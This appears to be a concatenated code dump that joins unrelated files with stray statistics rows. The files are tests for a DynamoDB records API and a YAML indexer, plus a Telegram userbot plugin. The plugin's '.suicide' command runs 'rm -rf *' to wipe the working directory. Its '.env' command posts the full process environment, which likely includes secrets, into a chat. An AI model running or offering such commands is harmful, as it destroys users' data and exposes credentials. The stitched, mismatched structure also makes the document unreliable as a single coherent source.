'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
old_record = record.GET_RECORDS_QUERY_LIMIT
record.GET_RECORDS_QUERY_LIMIT = 1
event = {}
actual = record.get_records(event, context=None)
record.GET_RECORDS_QUERY_LIMIT = old_record
expected_body = {
'records': [
item,
],
'nextPage': 'eyJyZWNvcmRfaWQiOiAiNWYwMThiM2QtZTUwZS00NGM5LWE1NDAtMTcxN2UwMGYwOWJhIiwgIm93bmVyX2lkIjogInJhbW9tYXIifQ==',
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_paginate_records_next_page(gaston_table):
"""it should be able to go to the next page"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
record_raw_2 = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '651',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item_2 = {
'owner_id': 'ramomar',
'record_id': 'e12c0208-250f-4231-858b-ed82ffa4ed5e',
'note': record_raw_2['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw_2['operation_date'],
'raw': json.dumps(record_raw_2, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
gaston_table.put_item(Item=item_2)
old_record = record.GET_RECORDS_QUERY_LIMIT
record.GET_RECORDS_QUERY_LIMIT = 1
event = {
'queryStringParameters': None,
}
first_page_records = record.get_records(event, context=None)
next_page_event = {
'queryStringParameters': {
'page': json.loads(first_page_records['body'])['nextPage'],
}
}
next_page = record.get_records(next_page_event, context=None)
record.GET_RECORDS_QUERY_LIMIT = old_record
expected_body = {
'records': [
item_2,
],
# Even if it's the last item, DynamoDB still returns a LastEvaluatedKey. The next query will return empty.
'nextPage': 'eyJyZWNvcmRfaWQiOiAiZTEyYzAyMDgtMjUwZi00MjMxLTg1OGItZWQ4MmZmYTRlZDVlIiwgIm93bmVyX2lkIjogInJhbW9tYXIifQ==',
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert next_page['statusCode'] == expected['statusCode']
assert next_page['headers'] == expected['headers']
assert json.loads(next_page['body']) == json.loads(expected['body'])
def test_get_unreviewed_records(gaston_table):
"""it should return a list of unreviewed records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
unreviewed_record = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
record_raw_2 = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '651',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
reviewed_record = {
'owner_id': 'ramomar',
'record_id': 'e12c0208-250f-4231-858b-ed82ffa4ed5e',
'note': record_raw_2['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw_2['operation_date'],
'raw': json.dumps(record_raw_2, default=str),
'origin': 'BANORTE_EMAIL_SES',
'review': {
'amount': '651',
'date': '2020-07-19T18:56:00.000Z',
'note': 'Salud',
'category': 'Salud',
},
}
gaston_table.put_item(Item=unreviewed_record)
gaston_table.put_item(Item=reviewed_record)
event = {
'path': '/records/unreviewed',
}
actual = record.get_records(event, context=None)
expected_body = {
'records': [
unreviewed_record,
],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_get_record_not_found():
"""it should return nothing when the record is not found"""
event = {
'pathParameters': {
'record_id': str(uuid.uuid4()),
}
}
actual = record.get_record(event, context=None)
expected_body = {
'record': None
}
expected = {
'statusCode': 404,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual == expected
def test_get_record(gaston_table):
"""it should return a record"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item_id = str(uuid.uuid4())
item = {
'owner_id': 'ramomar',
'record_id': item_id,
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
event = {
'pathParameters': {
'record_id': item_id,
}
}
actual = record.get_record(event, context=None)
expected_body = {
'record': item,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
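As the LastEvaluatedKey comment above suggests, the nextPage tokens expected by these tests appear to be base64-encoded JSON of the DynamoDB key. Decoding the first expected token illustrates this (sketch only, standard library only):
import base64
import json

token = 'eyJyZWNvcmRfaWQiOiAiNWYwMThiM2QtZTUwZS00NGM5LWE1NDAtMTcxN2UwMGYwOWJhIiwgIm93bmVyX2lkIjogInJhbW9tYXIifQ=='
# Decodes to the item's key attributes used by the tests above.
print(json.loads(base64.b64decode(token)))
# {'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba', 'owner_id': 'ramomar'}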
| 29.355932
| 127
| 0.530848
| 1,183
| 12,124
| 5.253593
| 0.121724
| 0.050684
| 0.030893
| 0.032663
| 0.833307
| 0.81609
| 0.782784
| 0.782784
| 0.77313
| 0.760579
| 0
| 0.039894
| 0.313593
| 12,124
| 412
| 128
| 29.427184
| 0.706921
| 0.03225
| 0
| 0.715818
| 0
| 0
| 0.298196
| 0.054971
| 0
| 0
| 0
| 0
| 0.045576
| 1
| 0.018767
| false
| 0
| 0.010724
| 0
| 0.029491
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5c9e26dd2859c1e1608552fb159904d85c54030
| 14,217
|
py
|
Python
|
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | 9
|
2021-05-16T23:40:05.000Z
|
2022-03-26T02:08:17.000Z
|
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | null | null | null |
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | 47
|
2021-03-16T17:16:25.000Z
|
2022-03-29T12:59:36.000Z
|
"""COMMAND : .cpu, .uptime, .suicide, .env, .pip, .neofetch, .coffeehouse, .date, .stdplugins, .fast, .iwantsex, .telegram, .listpip, .pyfiglet, .kowsay, .name, .faast, .daddyjoke, .fortune, .qquote, .fakeid, .vpn, .kwot, .qpro, .covid"""
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
import os
import sys
from telethon import events, functions, __version__
from userbot.utils import admin_cmd
from asyncio.subprocess import PIPE as asyncPIPE
from asyncio import create_subprocess_exec as asyncrunapp
if not os.path.isdir("./SAVED"):
os.makedirs("./SAVED")
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
@borg.on(admin_cmd(outgoing=True, pattern="pips(?: |$)(.*)"))
async def pipcheck(pip):
pipmodule = pip.pattern_match.group(1)
if pipmodule:
await pip.edit("`Searching . . .`")
pipc = await asyncrunapp(
"pip3",
"search",
pipmodule,
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await pipc.communicate()
pipout = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
if pipout:
if len(pipout) > 4096:
await pip.edit("`Output too large, sending as file`")
file = open("pips.txt", "w+")
file.write(pipout)
file.close()
await pip.client.send_file(
pip.chat_id,
"pips.txt",
reply_to=pip.id,
caption = pipmodule,
)
os.remove("pips.txt")
return
await pip.edit("**Query: **\n`"
f"pip3 search {pipmodule}"
"`\n**Result: **\n`"
f"{pipout}"
"`")
else:
await pip.edit("**Query: **\n`"
f"pip3 search {pipmodule}"
"`\n**Result: **\n`No Result Returned/False`")
else:
await pip.edit("`Use .help system to see an example`")
@borg.on(admin_cmd(pattern="suicide$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "rm -rf *"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) SUICIDE BOMB:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="plugins$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "ls userbot/plugins"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) PLUGINS:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="date$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "date"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="env$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "env"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) Environment Module:**\n\n\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fast$"))
async def _(event):
await event.edit("calculating...")
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "speedtest-cli"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) , Server Speed Calculated:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fortune$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pytuneteller pisces --today"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="qquote$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "jotquote"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fakeid$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "csvfaker -r 10 first_name last_name job"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="kwot$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "kwot"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "kwot.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="qpro$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "programmingquotes -l EN"
# if dirname == tempdir:
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
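All of the command handlers above repeat the same run-a-shell-command-and-reply logic. As a sketch only (assuming the same module-level borg client and Config globals used by the handlers above, not the plugin's actual structure), that pattern could be collapsed into one helper:
import asyncio
import io


async def run_and_reply(event, cmd, header=""):
    # `borg` and `Config` are the module-level globals used by the handlers above.
    # Reply to the message the command was issued in reply to, if any.
    reply_to_id = event.reply_to_msg_id or event.message.id
    process = await asyncio.create_subprocess_shell(
        cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
    )
    stdout, stderr = await process.communicate()
    output = header + stdout.decode()
    if len(output) > Config.MAX_MESSAGE_SIZE_LIMIT:
        # Too long for a message: send the output as a document instead.
        with io.BytesIO(str.encode(output)) as out_file:
            out_file.name = "output.txt"
            await borg.send_file(
                event.chat_id,
                out_file,
                force_document=True,
                allow_cache=False,
                caption=cmd,
                reply_to=reply_to_id,
            )
        await event.delete()
    else:
        await event.edit(output)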
| 32.833718
| 238
| 0.591264
| 1,747
| 14,217
| 4.586148
| 0.123068
| 0.035821
| 0.034948
| 0.037444
| 0.812781
| 0.806166
| 0.806166
| 0.806166
| 0.806166
| 0.806166
| 0
| 0.007481
| 0.304213
| 14,217
| 432
| 239
| 32.909722
| 0.802467
| 0.094675
| 0
| 0.743169
| 0
| 0
| 0.070365
| 0.014026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030055
| 0
| 0.060109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9135aa692eef59de085687042120fe5e6552307c
| 5,231
|
py
|
Python
|
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | 1
|
2022-03-28T17:47:16.000Z
|
2022-03-28T17:47:16.000Z
|
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | null | null | null |
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from yamlindexer.core import YAMLIndex
from unittest import TestCase
import pytest
t = TestCase()
yi = YAMLIndex(root_path='tests/fixtures')
def pytest_configure(config):
config.addinivalue_line(
"markers", "env(name): mark test to run only on named environment"
)
@pytest.mark.search_kv
def test_search_kv_1():
t.assertCountEqual(yi.search_kv(kind='Deployment'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_kv
def test_search_kv_2():
t.assertCountEqual(yi.search_kv(kind='Pod'), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_kv
def test_search_kv_3():
t.assertCountEqual(yi.search_kv(apiVersion='v1'), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_kv
def test_search_kv_4():
t.assertCountEqual(yi.search_kv(apiVersion='v1', kind='Pod'), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_kv
def test_search_kv_5():
t.assertCountEqual(yi.search_kv(kind='Deployment', apiVersion='apps/v1'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search
def test_search_1():
t.assertCountEqual(yi.search({'kind': 'Deployment'}), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search
def test_search_2():
t.assertCountEqual(yi.search({'kind': 'Pod'}), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search
def test_search_3():
t.assertCountEqual(yi.search({'apiVersion': 'v1'}), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search
def test_search_4():
t.assertCountEqual(yi.search({'apiVersion': 'v1', 'kind': 'Pod'}), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search
def test_search_5():
t.assertCountEqual(yi.search({'kind': 'Deployment', 'apiVersion': 'apps/v1'}), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_1():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_2():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_3():
t.assertCountEqual(yi.search_one_of([
{'apiVersion': 'v1'},
]), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_4():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_5():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment', 'apiVersion': 'v1'},
]), [])
@pytest.mark.search_one_of
def test_search_one_of_6():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'apiVersion': 'apps/v1'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_7():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'apiVersion': 'apps/v1'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_8():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment', 'apiVersion': 'apps/v1'},
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_1():
t.assertCountEqual(yi.search_dpath('/spec/template/spec/containers/*/image/nginx'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_2():
t.assertCountEqual(yi.search_dpath('/spec/ports/*/port/80'), [
'tests/fixtures/yaml/service-nginx.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_3():
t.assertCountEqual(yi.search_dpath('**/port/80'), [
'tests/fixtures/yaml/service-nginx.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_4():
t.assertCountEqual(yi.search_dpath('/metadata/name/nginx'), [
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_5():
t.assertCountEqual(yi.search_dpath('/spec/ports'), [
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_6():
t.assertCountEqual(yi.search_dpath('**/nginx'), [
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
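The fixture files under tests/fixtures are not shown here, but the assertions above imply their shape. As an inferred illustration only, deployment.yaml would parse to roughly this structure:
inferred_deployment = {
    # Inferred from the search_kv / search_dpath assertions above; not copied
    # from the repository's actual fixture file.
    'apiVersion': 'apps/v1',
    'kind': 'Deployment',
    'metadata': {'name': 'nginx'},
    'spec': {'template': {'spec': {'containers': [{'image': 'nginx'}]}}},
}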
| 24.330233
| 89
| 0.650354
| 656
| 5,231
| 4.984756
| 0.097561
| 0.147095
| 0.187156
| 0.183486
| 0.91896
| 0.877064
| 0.816514
| 0.744343
| 0.696024
| 0.64893
| 0
| 0.009309
| 0.178551
| 5,231
| 214
| 90
| 24.443925
| 0.751687
| 0.004015
| 0
| 0.66875
| 0
| 0
| 0.327957
| 0.246736
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.15625
| false
| 0
| 0.01875
| 0
| 0.175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e67d9355d651996b20e5c063657bfb1dc348bb30
| 131,303
|
py
|
Python
|
dn/views.py
|
Briliant-wang/GreaterWMS
|
6b8a6515901ec09b5a2a754a8470f7229a2820cf
|
[
"Apache-2.0"
] | 1
|
2022-01-10T18:31:12.000Z
|
2022-01-10T18:31:12.000Z
|
dn/views.py
|
jiangtaojiang/GreaterWMS
|
df155ae774398846c3c96f581debc4ea676548f5
|
[
"Apache-2.0"
] | null | null | null |
dn/views.py
|
jiangtaojiang/GreaterWMS
|
df155ae774398846c3c96f581debc4ea676548f5
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import viewsets
